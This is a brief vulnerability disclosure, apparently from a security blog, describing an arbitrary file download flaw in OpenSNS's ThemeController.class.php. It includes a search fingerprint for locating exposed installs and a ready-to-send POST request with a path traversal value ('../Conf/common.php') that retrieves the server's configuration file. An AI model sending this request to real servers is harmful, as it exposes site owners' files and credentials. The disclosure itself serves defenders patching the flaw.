Opensns Themecontroller Class Php A Vulnerability To Download Any File In The Background
Opensns Themecontroller Class Php A Vulnerability To Download Any File In The Background
OpenSNS ThemeController.class.php A vulnerability to download any file in the background
Vulnerability Description
File downloads exist in the OpenSNS ThemeController.class.php file, where insufficient filtering results in downloading any file on the server.
Vulnerability Impact
OpenSNS
Network surveying and mapping
icon_hash=”1167011145”
Vulnerability reappears
The login page is as follows
The vulnerable file is Application/Admin/Model/ThemeController.class.php
The theme parameter is a user-controllable parameter. According to the function process, it can be found that the existing file will be packaged as a zip file for download.
Construct request
1
2
3
POST /admin.php?s=/theme/packageDownload
theme=../Conf/common.php
This post is licensed under CC BY 4.0 by the author.